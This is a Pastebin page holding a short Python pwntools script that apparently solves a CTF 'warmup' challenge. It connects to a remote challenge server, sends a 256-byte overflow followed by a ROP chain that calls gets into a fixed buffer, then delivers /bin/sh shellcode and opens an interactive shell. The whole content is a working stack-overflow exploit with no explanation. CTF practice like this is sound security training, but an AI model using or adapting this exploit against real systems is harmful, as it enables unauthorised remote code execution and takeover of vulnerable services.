Advertisement
Guest User

Untitled

a guest
Sep 19th, 2019
131
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.32 KB | None | 0 0
  1. from pwn import *
  2.  
  3. context.arch = 'amd64'
  4.  
  5.  
  6. p = remote("nothing.chal.ctf.westerns.tokyo",10001)
  7. elf = ELF('./warmup')
  8.  
  9. rdi = 0x400773
  10. buf = 0x0601a00
  11. shellcode = asm(shellcraft.sh())
  12.  
  13. rop = p64(0xdeadbeef)+p64(rdi)+p64(buf)+p64(elf.plt["gets"])+p64(buf)
  14.  
  15. p.sendline("A"*256+rop)
  16. sleep(0.5)
  17. p.send(shellcode)
  18.  
  19. p.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement